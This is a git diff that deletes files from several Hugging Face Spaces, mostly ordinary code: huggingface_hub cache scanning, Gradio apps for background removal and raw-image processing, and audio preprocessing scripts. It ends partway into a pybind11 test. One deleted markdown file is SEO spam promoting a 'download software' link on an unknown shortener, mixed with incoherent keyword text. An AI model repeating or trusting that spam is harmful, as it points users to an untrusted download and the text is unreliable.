the - cache-system while scanning. - warnings (`List[CorruptedCacheException]`): - List of [`~CorruptedCacheException`] that occurred while scanning the cache. - Those exceptions are captured so that the scan can continue. Corrupted repos - are skipped from the scan. - - - - Here `size_on_disk` is equal to the sum of all repo sizes (only blobs). However if - some cached repos are corrupted, their sizes are not taken into account. - - - """ - - size_on_disk: int - repos: FrozenSet[CachedRepoInfo] - warnings: List[CorruptedCacheException] - - @property - def size_on_disk_str(self) -> str: - """ - (property) Sum of all valid repo sizes in the cache-system as a human-readable - string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - def delete_revisions(self, *revisions: str) -> DeleteCacheStrategy: - """Prepare the strategy to delete one or more revisions cached locally. - - Input revisions can be any revision hash. If a revision hash is not found in the - local cache, a warning is thrown but no error is raised. 
Revisions can be from - different cached repos since hashes are unique across repos, - - Examples: - ```py - >>> from huggingface_hub import scan_cache_dir - >>> cache_info = scan_cache_dir() - >>> delete_strategy = cache_info.delete_revisions( - ... "81fd1d6e7847c99f5862c9fb81387956d99ec7aa" - ... ) - >>> print(f"Will free {delete_strategy.expected_freed_size_str}.") - Will free 7.9K. - >>> delete_strategy.execute() - Cache deletion done. Saved 7.9K. - ``` - - ```py - >>> from huggingface_hub import scan_cache_dir - >>> scan_cache_dir().delete_revisions( - ... "81fd1d6e7847c99f5862c9fb81387956d99ec7aa", - ... "e2983b237dccf3ab4937c97fa717319a9ca1a96d", - ... "6c0e6080953db56375760c0471a8c5f2929baf11", - ... ).execute() - Cache deletion done. Saved 8.6G. - ``` - - - - `delete_revisions` returns a [`~utils.DeleteCacheStrategy`] object that needs to - be executed. The [`~utils.DeleteCacheStrategy`] is not meant to be modified but - allows having a dry run before actually executing the deletion. - - - """ - hashes_to_delete: Set[str] = set(revisions) - - repos_with_revisions: Dict[CachedRepoInfo, Set[CachedRevisionInfo]] = defaultdict(set) - - for repo in self.repos: - for revision in repo.revisions: - if revision.commit_hash in hashes_to_delete: - repos_with_revisions[repo].add(revision) - hashes_to_delete.remove(revision.commit_hash) - - if len(hashes_to_delete) > 0: - logger.warning(f"Revision(s) not found - cannot delete them: {', '.join(hashes_to_delete)}") - - delete_strategy_blobs: Set[Path] = set() - delete_strategy_refs: Set[Path] = set() - delete_strategy_repos: Set[Path] = set() - delete_strategy_snapshots: Set[Path] = set() - delete_strategy_expected_freed_size = 0 - - for affected_repo, revisions_to_delete in repos_with_revisions.items(): - other_revisions = affected_repo.revisions - revisions_to_delete - - # If no other revisions, it means all revisions are deleted - # -> delete the entire cached repo - if len(other_revisions) == 0: - delete_strategy_repos.add(affected_repo.repo_path) - delete_strategy_expected_freed_size += affected_repo.size_on_disk - continue - - # Some revisions of the repo will be deleted but not all. We need to filter - # which blob files will not be linked anymore. - for revision_to_delete in revisions_to_delete: - # Snapshot dir - delete_strategy_snapshots.add(revision_to_delete.snapshot_path) - - # Refs dir - for ref in revision_to_delete.refs: - delete_strategy_refs.add(affected_repo.repo_path / "refs" / ref) - - # Blobs dir - for file in revision_to_delete.files: - if file.blob_path not in delete_strategy_blobs: - is_file_alone = True - for revision in other_revisions: - for rev_file in revision.files: - if file.blob_path == rev_file.blob_path: - is_file_alone = False - break - if not is_file_alone: - break - - # Blob file not referenced by remaining revisions -> delete - if is_file_alone: - delete_strategy_blobs.add(file.blob_path) - delete_strategy_expected_freed_size += file.size_on_disk - - # Return the strategy instead of executing it. - return DeleteCacheStrategy( - blobs=frozenset(delete_strategy_blobs), - refs=frozenset(delete_strategy_refs), - repos=frozenset(delete_strategy_repos), - snapshots=frozenset(delete_strategy_snapshots), - expected_freed_size=delete_strategy_expected_freed_size, - ) - - -def scan_cache_dir(cache_dir: Optional[Union[str, Path]] = None) -> HFCacheInfo: - """Scan the entire HF cache-system and return a [`~HFCacheInfo`] structure. - - Use `scan_cache_dir` in order to programmatically scan your cache-system. 
The cache - will be scanned repo by repo. If a repo is corrupted, a [`~CorruptedCacheException`] - will be thrown internally but captured and returned in the [`~HFCacheInfo`] - structure. Only valid repos get a proper report. - - ```py - >>> from huggingface_hub import scan_cache_dir - - >>> hf_cache_info = scan_cache_dir() - HFCacheInfo( - size_on_disk=3398085269, - repos=frozenset({ - CachedRepoInfo( - repo_id='t5-small', - repo_type='model', - repo_path=PosixPath(...), - size_on_disk=970726914, - nb_files=11, - revisions=frozenset({ - CachedRevisionInfo( - commit_hash='d78aea13fa7ecd06c29e3e46195d6341255065d5', - size_on_disk=970726339, - snapshot_path=PosixPath(...), - files=frozenset({ - CachedFileInfo( - file_name='config.json', - size_on_disk=1197 - file_path=PosixPath(...), - blob_path=PosixPath(...), - ), - CachedFileInfo(...), - ... - }), - ), - CachedRevisionInfo(...), - ... - }), - ), - CachedRepoInfo(...), - ... - }), - warnings=[ - CorruptedCacheException("Snapshots dir doesn't exist in cached repo: ..."), - CorruptedCacheException(...), - ... - ], - ) - ``` - - You can also print a detailed report directly from the `huggingface-cli` using: - ```text - > huggingface-cli scan-cache - REPO ID REPO TYPE SIZE ON DISK NB FILES REFS LOCAL PATH - --------------------------- --------- ------------ -------- ------------------- ------------------------------------------------------------------------- - glue dataset 116.3K 15 1.17.0, main, 2.4.0 /Users/lucain/.cache/huggingface/hub/datasets--glue - google/fleurs dataset 64.9M 6 main, refs/pr/1 /Users/lucain/.cache/huggingface/hub/datasets--google--fleurs - Jean-Baptiste/camembert-ner model 441.0M 7 main /Users/lucain/.cache/huggingface/hub/models--Jean-Baptiste--camembert-ner - bert-base-cased model 1.9G 13 main /Users/lucain/.cache/huggingface/hub/models--bert-base-cased - t5-base model 10.1K 3 main /Users/lucain/.cache/huggingface/hub/models--t5-base - t5-small model 970.7M 11 refs/pr/1, main /Users/lucain/.cache/huggingface/hub/models--t5-small - - Done in 0.0s. Scanned 6 repo(s) for a total of 3.4G. - Got 1 warning(s) while scanning. Use -vvv to print details. - ``` - - Args: - cache_dir (`str` or `Path`, `optional`): - Cache directory to cache. Defaults to the default HF cache directory. - - - - Raises: - - `CacheNotFound` - If the cache directory does not exist. - - [`ValueError`](https://docs.python.org/3/library/exceptions.html#ValueError) - If the cache directory is a file, instead of a directory. - - - - Returns: a [`~HFCacheInfo`] object. - """ - if cache_dir is None: - cache_dir = HUGGINGFACE_HUB_CACHE - - cache_dir = Path(cache_dir).expanduser().resolve() - if not cache_dir.exists(): - raise CacheNotFound( - ( - f"Cache directory not found: {cache_dir}. Please use `cache_dir`" - " argument or set `HUGGINGFACE_HUB_CACHE` environment variable." - ), - cache_dir=cache_dir, - ) - - if cache_dir.is_file(): - raise ValueError( - f"Scan cache expects a directory but found a file: {cache_dir}. Please use" - " `cache_dir` argument or set `HUGGINGFACE_HUB_CACHE` environment" - " variable." 
- ) - - repos: Set[CachedRepoInfo] = set() - warnings: List[CorruptedCacheException] = [] - for repo_path in cache_dir.iterdir(): - try: - repos.add(_scan_cached_repo(repo_path)) - except CorruptedCacheException as e: - warnings.append(e) - - return HFCacheInfo( - repos=frozenset(repos), - size_on_disk=sum(repo.size_on_disk for repo in repos), - warnings=warnings, - ) - - -def _scan_cached_repo(repo_path: Path) -> CachedRepoInfo: - """Scan a single cache repo and return information about it. - - Any unexpected behavior will raise a [`~CorruptedCacheException`]. - """ - if not repo_path.is_dir(): - raise CorruptedCacheException(f"Repo path is not a directory: {repo_path}") - - if "--" not in repo_path.name: - raise CorruptedCacheException(f"Repo path is not a valid HuggingFace cache directory: {repo_path}") - - repo_type, repo_id = repo_path.name.split("--", maxsplit=1) - repo_type = repo_type[:-1] # "models" -> "model" - repo_id = repo_id.replace("--", "/") # google/fleurs -> "google/fleurs" - - if repo_type not in {"dataset", "model", "space"}: - raise CorruptedCacheException( - f"Repo type must be `dataset`, `model` or `space`, found `{repo_type}` ({repo_path})." - ) - - blob_stats: Dict[Path, os.stat_result] = {} # Key is blob_path, value is blob stats - - snapshots_path = repo_path / "snapshots" - refs_path = repo_path / "refs" - - if not snapshots_path.exists() or not snapshots_path.is_dir(): - raise CorruptedCacheException(f"Snapshots dir doesn't exist in cached repo: {snapshots_path}") - - # Scan over `refs` directory - - # key is revision hash, value is set of refs - refs_by_hash: Dict[str, Set[str]] = defaultdict(set) - if refs_path.exists(): - # Example of `refs` directory - # ── refs - # ├── main - # └── refs - # └── pr - # └── 1 - if refs_path.is_file(): - raise CorruptedCacheException(f"Refs directory cannot be a file: {refs_path}") - - for ref_path in refs_path.glob("**/*"): - # glob("**/*") iterates over all files and directories -> skip directories - if ref_path.is_dir(): - continue - - ref_name = str(ref_path.relative_to(refs_path)) - with ref_path.open() as f: - commit_hash = f.read() - - refs_by_hash[commit_hash].add(ref_name) - - # Scan snapshots directory - cached_revisions: Set[CachedRevisionInfo] = set() - for revision_path in snapshots_path.iterdir(): - if revision_path.is_file(): - raise CorruptedCacheException(f"Snapshots folder corrupted. 
Found a file: {revision_path}") - - cached_files = set() - for file_path in revision_path.glob("**/*"): - # glob("**/*") iterates over all files and directories -> skip directories - if file_path.is_dir(): - continue - - blob_path = Path(file_path).resolve() - if not blob_path.exists(): - raise CorruptedCacheException(f"Blob missing (broken symlink): {blob_path}") - - if blob_path not in blob_stats: - blob_stats[blob_path] = blob_path.stat() - - cached_files.add( - CachedFileInfo( - file_name=file_path.name, - file_path=file_path, - size_on_disk=blob_stats[blob_path].st_size, - blob_path=blob_path, - blob_last_accessed=blob_stats[blob_path].st_atime, - blob_last_modified=blob_stats[blob_path].st_mtime, - ) - ) - - # Last modified is either the last modified blob file or the revision folder - # itself if it is empty - if len(cached_files) > 0: - revision_last_modified = max(blob_stats[file.blob_path].st_mtime for file in cached_files) - else: - revision_last_modified = revision_path.stat().st_mtime - - cached_revisions.add( - CachedRevisionInfo( - commit_hash=revision_path.name, - files=frozenset(cached_files), - refs=frozenset(refs_by_hash.pop(revision_path.name, set())), - size_on_disk=sum( - blob_stats[blob_path].st_size for blob_path in set(file.blob_path for file in cached_files) - ), - snapshot_path=revision_path, - last_modified=revision_last_modified, - ) - ) - - # Check that all refs referred to an existing revision - if len(refs_by_hash) > 0: - raise CorruptedCacheException( - f"Reference(s) refer to missing commit hashes: {dict(refs_by_hash)} ({repo_path})." - ) - - # Last modified is either the last modified blob file or the repo folder itself if - # no blob files has been found. Same for last accessed. - if len(blob_stats) > 0: - repo_last_accessed = max(stat.st_atime for stat in blob_stats.values()) - repo_last_modified = max(stat.st_mtime for stat in blob_stats.values()) - else: - repo_stats = repo_path.stat() - repo_last_accessed = repo_stats.st_atime - repo_last_modified = repo_stats.st_mtime - - # Build and return frozen structure - return CachedRepoInfo( - nb_files=len(blob_stats), - repo_id=repo_id, - repo_path=repo_path, - repo_type=repo_type, # type: ignore - revisions=frozenset(cached_revisions), - size_on_disk=sum(stat.st_size for stat in blob_stats.values()), - last_accessed=repo_last_accessed, - last_modified=repo_last_modified, - ) - - -def _format_size(num: int) -> str: - """Format size in bytes into a human-readable string. - - Taken from https://stackoverflow.com/a/1094933 - """ - num_f = float(num) - for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]: - if abs(num_f) < 1000.0: - return f"{num_f:3.1f}{unit}" - num_f /= 1000.0 - return f"{num_f:.1f}Y" - - -_TIMESINCE_CHUNKS = ( - # Label, divider, max value - ("second", 1, 60), - ("minute", 60, 60), - ("hour", 60 * 60, 24), - ("day", 60 * 60 * 24, 6), - ("week", 60 * 60 * 24 * 7, 6), - ("month", 60 * 60 * 24 * 30, 11), - ("year", 60 * 60 * 24 * 365, None), -) - - -def _format_timesince(ts: float) -> str: - """Format timestamp in seconds into a human-readable string, relative to now. - - Vaguely inspired by Django's `timesince` formatter. 
- """ - delta = time.time() - ts - if delta < 20: - return "a few seconds ago" - for label, divider, max_value in _TIMESINCE_CHUNKS: # noqa: B007 - value = round(delta / divider) - if max_value is not None and value <= max_value: - break - return f"{value} {label}{'s' if value > 1 else ''} ago" - - -def _try_delete_path(path: Path, path_type: str) -> None: - """Try to delete a local file or folder. - - If the path does not exists, error is logged as a warning and then ignored. - - Args: - path (`Path`) - Path to delete. Can be a file or a folder. - path_type (`str`) - What path are we deleting ? Only for logging purposes. Example: "snapshot". - """ - logger.info(f"Delete {path_type}: {path}") - try: - if path.is_file(): - os.remove(path) - else: - shutil.rmtree(path) - except FileNotFoundError: - logger.warning(f"Couldn't delete {path_type}: file not found ({path})", exc_info=True) - except PermissionError: - logger.warning(f"Couldn't delete {path_type}: permission denied ({path})", exc_info=True) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/testing/jpl_units/UnitDblFormatter.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/testing/jpl_units/UnitDblFormatter.py deleted file mode 100644 index da262eae3e2d569ac37e9cf9b118a72e61b0e7d2..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/testing/jpl_units/UnitDblFormatter.py +++ /dev/null @@ -1,28 +0,0 @@ -"""UnitDblFormatter module containing class UnitDblFormatter.""" - -import matplotlib.ticker as ticker - -__all__ = ['UnitDblFormatter'] - - -class UnitDblFormatter(ticker.ScalarFormatter): - """ - The formatter for UnitDbl data types. - - This allows for formatting with the unit string. 
- """ - - def __call__(self, x, pos=None): - # docstring inherited - if len(self.locs) == 0: - return '' - else: - return '{:.12}'.format(x) - - def format_data_short(self, value): - # docstring inherited - return '{:.12}'.format(value) - - def format_data(self, value): - # docstring inherited - return '{:.12}'.format(value) diff --git a/spaces/lakshmi324/DocuAI/README.md b/spaces/lakshmi324/DocuAI/README.md deleted file mode 100644 index 14b8ef155c7e43d4df3637b14e971585c517a4e3..0000000000000000000000000000000000000000 --- a/spaces/lakshmi324/DocuAI/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: OpenAI PDF QnA -emoji: 📉 -colorFrom: blue -colorTo: indigo -sdk: gradio -sdk_version: 3.24.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- -[Check out my blog](https://bitsnbytesofai.hashnode.dev/unlocking-the-power-of-pdfs-with-ai-a-guide-to-building-your-own-qa-system) - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/leave7/kazunaAI2.0/inference_main.py b/spaces/leave7/kazunaAI2.0/inference_main.py deleted file mode 100644 index 825e791db86d37e955f42e8cb34323dbb248ed32..0000000000000000000000000000000000000000 --- a/spaces/leave7/kazunaAI2.0/inference_main.py +++ /dev/null @@ -1,65 +0,0 @@ -import io -import logging -import time -from pathlib import Path - -import librosa -import numpy as np -import soundfile - -from inference import infer_tool -from inference import slicer -from inference.infer_tool import Svc - -logging.getLogger('numba').setLevel(logging.WARNING) -chunks_dict = infer_tool.read_temp("inference/chunks_temp.json") - -model_path = "logs/48k/G_174000-Copy1.pth" -config_path = "configs/config.json" -svc_model = Svc(model_path, config_path) -infer_tool.mkdir(["raw", "results"]) - -# 支持多个wav文件,放在raw文件夹下 -clean_names = ["君の知らない物語-src"] -trans = [-5] # 音高调整,支持正负(半音) -spk_list = ['yunhao'] # 每次同时合成多语者音色 -slice_db = -40 # 默认-40,嘈杂的音频可以-30,干声保留呼吸可以-50 -wav_format = 'flac' # 音频输出格式 - -infer_tool.fill_a_to_b(trans, clean_names) -for clean_name, tran in zip(clean_names, trans): - raw_audio_path = f"raw/{clean_name}" - if "." 
not in raw_audio_path: - raw_audio_path += ".wav" - infer_tool.format_wav(raw_audio_path) - wav_path = Path(raw_audio_path).with_suffix('.wav') - audio, sr = librosa.load(wav_path, mono=True, sr=None) - wav_hash = infer_tool.get_md5(audio) - if wav_hash in chunks_dict.keys(): - print("load chunks from temp") - chunks = chunks_dict[wav_hash]["chunks"] - else: - chunks = slicer.cut(wav_path, db_thresh=slice_db) - print(chunks) - chunks_dict[wav_hash] = {"chunks": chunks, "time": int(time.time())} - infer_tool.write_temp("inference/chunks_temp.json", chunks_dict) - audio_data, audio_sr = slicer.chunks2audio(wav_path, chunks) - - for spk in spk_list: - audio = [] - for (slice_tag, data) in audio_data: - print(f'#=====segment start, {round(len(data) / audio_sr, 3)}s======') - length = int(np.ceil(len(data) / audio_sr * svc_model.target_sample)) - raw_path = io.BytesIO() - soundfile.write(raw_path, data, audio_sr, format="wav") - raw_path.seek(0) - if slice_tag: - print('jump empty segment') - _audio = np.zeros(length) - else: - out_audio, out_sr = svc_model.infer(spk, tran, raw_path) - _audio = out_audio.cpu().numpy() - audio.extend(list(_audio)) - - res_path = f'./results/{clean_name}_{tran}key_{spk}.{wav_format}' - soundfile.write(res_path, audio, svc_model.target_sample, format=wav_format) diff --git a/spaces/leonelhs/carvekit/app.py b/spaces/leonelhs/carvekit/app.py deleted file mode 100644 index 373066a9d31997c69fbd3b525ea51af65c12e13c..0000000000000000000000000000000000000000 --- a/spaces/leonelhs/carvekit/app.py +++ /dev/null @@ -1,95 +0,0 @@ -import gradio as gr -import torch -from carvekit.api.interface import Interface -from carvekit.ml.wrap.basnet import BASNET -from carvekit.ml.wrap.deeplab_v3 import DeepLabV3 -from carvekit.ml.wrap.fba_matting import FBAMatting -from carvekit.ml.wrap.tracer_b7 import TracerUniversalB7 -from carvekit.ml.wrap.u2net import U2NET -from carvekit.pipelines.postprocessing import MattingMethod -from carvekit.pipelines.preprocessing import PreprocessingStub -from carvekit.trimap.generator import TrimapGenerator - -device = 'cuda' if torch.cuda.is_available() else 'cpu' - -segment_net = { - "U2NET": U2NET(device=device, batch_size=1), - "BASNET": BASNET(device=device, batch_size=1), - "DeepLabV3": DeepLabV3(device=device, batch_size=1), - "TracerUniversalB7": TracerUniversalB7(device=device, batch_size=1) -} - -fba = FBAMatting(device=device, - input_tensor_size=2048, - batch_size=1) - -trimap = TrimapGenerator() - -preprocessing = PreprocessingStub() - -postprocessing = MattingMethod(matting_module=fba, - trimap_generator=trimap, - device=device) - -method_choices = [k for k, v in segment_net.items()] - - -def generate_trimap(method, original): - mask = segment_net[method]([original]) - return trimap(original_image=original, mask=mask[0]) - - -def predict(method, image): - method = segment_net[method] - return Interface(pre_pipe=preprocessing, - post_pipe=postprocessing, - seg_pipe=method)([image])[0] - - -footer = r""" -
    -CarveKit -
    - -Demo based on CarveKit - -
    -""" - -with gr.Blocks(title="CarveKit") as app: - gr.Markdown("

    CarveKit

    ") - gr.HTML("

    High-quality image background removal

    ") - - with gr.Tabs() as tabs: - with gr.TabItem("Remove background", id=0): - with gr.Row(equal_height=False): - with gr.Column(): - input_img = gr.Image(type="pil", label="Input image") - drp_itf = gr.Dropdown( - value="TracerUniversalB7", - label="Segmentor model", - choices=method_choices) - run_btn = gr.Button(variant="primary") - with gr.Column(): - output_img = gr.Image(type="pil", label="result") - - run_btn.click(predict, [drp_itf, input_img], [output_img]) - - with gr.TabItem("Trimap generator", id=1): - with gr.Row(equal_height=False): - with gr.Column(): - trimap_input = gr.Image(type="pil", label="Input image") - drp_itf = gr.Dropdown( - value="TracerUniversalB7", - label="Segmentor model", - choices=method_choices) - trimap_btn = gr.Button(variant="primary") - with gr.Column(): - trimap_output = gr.Image(type="pil", label="result") - - trimap_btn.click(generate_trimap, [drp_itf, trimap_input], [trimap_output]) - - with gr.Row(): - gr.HTML(footer) - -app.launch(share=False, debug=True, enable_queue=True, show_error=True) diff --git a/spaces/lewiswu1209/MockingBird/ppg2mel/preprocess.py b/spaces/lewiswu1209/MockingBird/ppg2mel/preprocess.py deleted file mode 100644 index 0feee6e2458ee770d1b94c53a043b1146b580cef..0000000000000000000000000000000000000000 --- a/spaces/lewiswu1209/MockingBird/ppg2mel/preprocess.py +++ /dev/null @@ -1,113 +0,0 @@ - -import os -import torch -import numpy as np -from tqdm import tqdm -from pathlib import Path -import soundfile -import resampy - -from ppg_extractor import load_model -import encoder.inference as Encoder -from encoder.audio import preprocess_wav -from encoder import audio -from utils.f0_utils import compute_f0 - -from torch.multiprocessing import Pool, cpu_count -from functools import partial - -SAMPLE_RATE=16000 - -def _compute_bnf( - wav: any, - output_fpath: str, - device: torch.device, - ppg_model_local: any, -): - """ - Compute CTC-Attention Seq2seq ASR encoder bottle-neck features (BNF). 
- """ - ppg_model_local.to(device) - wav_tensor = torch.from_numpy(wav).float().to(device).unsqueeze(0) - wav_length = torch.LongTensor([wav.shape[0]]).to(device) - with torch.no_grad(): - bnf = ppg_model_local(wav_tensor, wav_length) - bnf_npy = bnf.squeeze(0).cpu().numpy() - np.save(output_fpath, bnf_npy, allow_pickle=False) - return bnf_npy, len(bnf_npy) - -def _compute_f0_from_wav(wav, output_fpath): - """Compute merged f0 values.""" - f0 = compute_f0(wav, SAMPLE_RATE) - np.save(output_fpath, f0, allow_pickle=False) - return f0, len(f0) - -def _compute_spkEmbed(wav, output_fpath, encoder_model_local, device): - Encoder.set_model(encoder_model_local) - # Compute where to split the utterance into partials and pad if necessary - wave_slices, mel_slices = Encoder.compute_partial_slices(len(wav), rate=1.3, min_pad_coverage=0.75) - max_wave_length = wave_slices[-1].stop - if max_wave_length >= len(wav): - wav = np.pad(wav, (0, max_wave_length - len(wav)), "constant") - - # Split the utterance into partials - frames = audio.wav_to_mel_spectrogram(wav) - frames_batch = np.array([frames[s] for s in mel_slices]) - partial_embeds = Encoder.embed_frames_batch(frames_batch) - - # Compute the utterance embedding from the partial embeddings - raw_embed = np.mean(partial_embeds, axis=0) - embed = raw_embed / np.linalg.norm(raw_embed, 2) - - np.save(output_fpath, embed, allow_pickle=False) - return embed, len(embed) - -def preprocess_one(wav_path, out_dir, device, ppg_model_local, encoder_model_local): - # wav = preprocess_wav(wav_path) - # try: - wav, sr = soundfile.read(wav_path) - if len(wav) < sr: - return None, sr, len(wav) - if sr != SAMPLE_RATE: - wav = resampy.resample(wav, sr, SAMPLE_RATE) - sr = SAMPLE_RATE - utt_id = os.path.basename(wav_path).rstrip(".wav") - - _, length_bnf = _compute_bnf(output_fpath=f"{out_dir}/bnf/{utt_id}.ling_feat.npy", wav=wav, device=device, ppg_model_local=ppg_model_local) - _, length_f0 = _compute_f0_from_wav(output_fpath=f"{out_dir}/f0/{utt_id}.f0.npy", wav=wav) - _, length_embed = _compute_spkEmbed(output_fpath=f"{out_dir}/embed/{utt_id}.npy", device=device, encoder_model_local=encoder_model_local, wav=wav) - -def preprocess_dataset(datasets_root, dataset, out_dir, n_processes, ppg_encoder_model_fpath, speaker_encoder_model): - # Glob wav files - wav_file_list = sorted(Path(f"{datasets_root}/{dataset}").glob("**/*.wav")) - print(f"Globbed {len(wav_file_list)} wav files.") - - out_dir.joinpath("bnf").mkdir(exist_ok=True, parents=True) - out_dir.joinpath("f0").mkdir(exist_ok=True, parents=True) - out_dir.joinpath("embed").mkdir(exist_ok=True, parents=True) - ppg_model_local = load_model(ppg_encoder_model_fpath, "cpu") - encoder_model_local = Encoder.load_model(speaker_encoder_model, "cpu") - if n_processes is None: - n_processes = cpu_count() - - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - func = partial(preprocess_one, out_dir=out_dir, ppg_model_local=ppg_model_local, encoder_model_local=encoder_model_local, device=device) - job = Pool(n_processes).imap(func, wav_file_list) - list(tqdm(job, "Preprocessing", len(wav_file_list), unit="wav")) - - # finish processing and mark - t_fid_file = out_dir.joinpath("train_fidlist.txt").open("w", encoding="utf-8") - d_fid_file = out_dir.joinpath("dev_fidlist.txt").open("w", encoding="utf-8") - e_fid_file = out_dir.joinpath("eval_fidlist.txt").open("w", encoding="utf-8") - for file in sorted(out_dir.joinpath("f0").glob("*.npy")): - id = os.path.basename(file).split(".f0.npy")[0] - if 
id.endswith("01"): - d_fid_file.write(id + "\n") - elif id.endswith("09"): - e_fid_file.write(id + "\n") - else: - t_fid_file.write(id + "\n") - t_fid_file.close() - d_fid_file.close() - e_fid_file.close() - return len(wav_file_list) diff --git a/spaces/lhoestq/datasets-explorer/README.md b/spaces/lhoestq/datasets-explorer/README.md deleted file mode 100644 index 292d06ee6de07ba1564b0d51c85f6819010ba470..0000000000000000000000000000000000000000 --- a/spaces/lhoestq/datasets-explorer/README.md +++ /dev/null @@ -1,20 +0,0 @@ ---- -title: Datasets Explorer -emoji: 📖 -colorFrom: pink -colorTo: purple -sdk: gradio -sdk_version: 3.19.1 -app_file: app.py -pinned: false ---- - -# 📖 Dataset Explorer - -Access any slice of data of any dataset on the [Hugging Face Dataset Hub](https://huggingface.co/datasets) - -Run: - -```python -gradio app.py -``` diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Download Software Rangka Atap Baja 12.md b/spaces/lincquiQcaudo/Top-20-Diffusion/Download Software Rangka Atap Baja 12.md deleted file mode 100644 index 252f4b72aff53aa5c583d35360bed0485b70f6db..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Download Software Rangka Atap Baja 12.md +++ /dev/null @@ -1,6 +0,0 @@ -

    download software rangka atap baja 12


    Download Zip »»» https://bytlly.com/2uGw0a



    -
    -pasang rangka atap baja ringan jayawan, platinum truss system baja ringan ... ppt download, software rangka atap baja ringan cv sukses mandiri teknik, rangka atap ... The Essence Of Success 12 Mini Biographies Richard Branson Bill Gates ... 4d29de3e1b
    -
    -
    -

    diff --git a/spaces/luisoala/raw2logit/app.py b/spaces/luisoala/raw2logit/app.py deleted file mode 100644 index a711ca3f9e47064deb6d2514c307f1ee22eb84d2..0000000000000000000000000000000000000000 --- a/spaces/luisoala/raw2logit/app.py +++ /dev/null @@ -1,57 +0,0 @@ -import gradio as gr -#import tensorflow as tf -import numpy as np -import json -from os.path import dirname, realpath, join -import processing.pipeline_numpy as ppn - - -# Load human-readable labels for ImageNet. -current_dir = dirname(realpath(__file__)) - - -def process(RawImage, CameraParameters, Debayer, Sharpening, Denoising): - raw_img = RawImage - if CameraParameters == "Microscope": - black_level = [9.834368023181512e-06, 9.834368023181512e-06, 9.834368023181512e-06, 9.834368023181512e-06] - white_balance = [-0.6567, 1.9673, 3.5304] - colour_matrix = [-2.0338, 0.0933, 0.4157, -0.0286, 2.6464, -0.0574, -0.5516, -0.0947, 2.9308] - elif CameraParameters == "Drone": - #drone - black_level = [0.0625, 0.0626, 0.0625, 0.0626] - white_balance = [2.86653646, 1., 1.73079425] - colour_matrix = [1.50768983, -0.33571374, -0.17197604, -0.23048614, - 1.70698738, -0.47650126, -0.03119153, -0.32803956, 1.35923111] - else: - black_level = [0.0625, 0.0626, 0.0625, 0.0626] - white_balance = [2.86653646, 1., 1.73079425] - colour_matrix = [1.50768983, -0.33571374, -0.17197604, -0.23048614, - 1.70698738, -0.47650126, -0.03119153, -0.32803956, 1.35923111] - debayer = Debayer - sharpening = Sharpening - denoising = Denoising - print(np.max(raw_img)) - raw_img = (raw_img[:,:,:].astype(np.float64)/255.) - img = ppn.processing(raw_img, black_level, white_balance, colour_matrix, - debayer=debayer, sharpening=sharpening, denoising=denoising) - print(np.max(img)) - return img - - -iface = gr.Interface( - process, - [gr.inputs.Image(),gr.inputs.Radio(["Microscope", "Drone"]),gr.inputs.Dropdown(["bilinear", "malvar2004", "menon2007"]), - gr.inputs.Dropdown(["sharpening_filter", "unsharp_masking"]), - gr.inputs.Dropdown(["gaussian_denoising", "median_denoising"])], - "image", - capture_session=True, - examples=[ - ["demo-files/car.png"], - ["demo-files/micro.png"] - ], - title="static pipeline demo", - description="You can select a sample raw image, the camera parameters and the pipeline configuration to process the raw image.") - -#if __name__ == "__main__": -iface.launch() - diff --git a/spaces/lysine/auscultate/src/lib/helper.ts b/spaces/lysine/auscultate/src/lib/helper.ts deleted file mode 100644 index 94b4c82d495460987ecf581e4803f2e602d48f19..0000000000000000000000000000000000000000 --- a/spaces/lysine/auscultate/src/lib/helper.ts +++ /dev/null @@ -1,66 +0,0 @@ -import type { Request, Response, NextFunction } from 'express'; -import { AnyZodObject, z } from 'zod'; -import { badRequest } from '@hapi/boom'; - -function indent(str: string, spaces: number) { - return str - .split('\n') - .map(line => ' '.repeat(spaces) + line) - .join('\n'); -} - -function extractZodMessage(error: any): string { - if (Array.isArray(error)) { - return error.map(extractZodMessage).join('\n'); - } else { - let union: string[] = []; - if ('unionErrors' in error) { - union = error.unionErrors.map(extractZodMessage); - } else if ('issues' in error) { - union = error.issues.map(extractZodMessage); - } - if ( - 'message' in error && - typeof error.message === 'string' && - !error.message.includes('\n') - ) { - if (union.length === 0) return error.message; - return error.message + '\n' + indent(union.join('\n'), 2); - } else if (union.length > 0) { - return union.join('\n'); 
- } else { - return ''; - } - } -} - -export async function validate( - req: Request, - schema: T -): Promise> { - try { - return await schema.parseAsync(req); - } catch (error: any) { - throw badRequest(extractZodMessage(error)); - } -} - -export function wrap( - fn: (req: Request, res: Response, next: NextFunction) => Promise -) { - return async function (req: Request, res: Response, next: NextFunction) { - try { - return await fn(req, res, next); - } catch (err) { - next(err); - } - }; -} - -export function log(...args: unknown[]) { - console.log(`[${process.env.pm_id ?? ''}]`, ...args); -} - -export function warn(...args: unknown[]) { - console.warn(`[${process.env.pm_id ?? ''}]`, ...args); -} diff --git a/spaces/ma-xu/LIVE/pybind11/tests/test_pickling.cpp b/spaces/ma-xu/LIVE/pybind11/tests/test_pickling.cpp deleted file mode 100644 index 9dc63bda3b5949032fbcd30e7aa4e7db2072dcff..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/pybind11/tests/test_pickling.cpp +++ /dev/null @@ -1,130 +0,0 @@ -/* - tests/test_pickling.cpp -- pickle support - - Copyright (c) 2016 Wenzel Jakob - - All rights reserved. Use of this source code is governed by a - BSD-style license that can be found in the LICENSE file. -*/ - -#include "pybind11_tests.h" - -TEST_SUBMODULE(pickling, m) { - // test_roundtrip - class Pickleable { - public: - Pickleable(const std::string &value) : m_value(value) { } - const std::string &value() const { return m_value; } - - void setExtra1(int extra1) { m_extra1 = extra1; } - void setExtra2(int 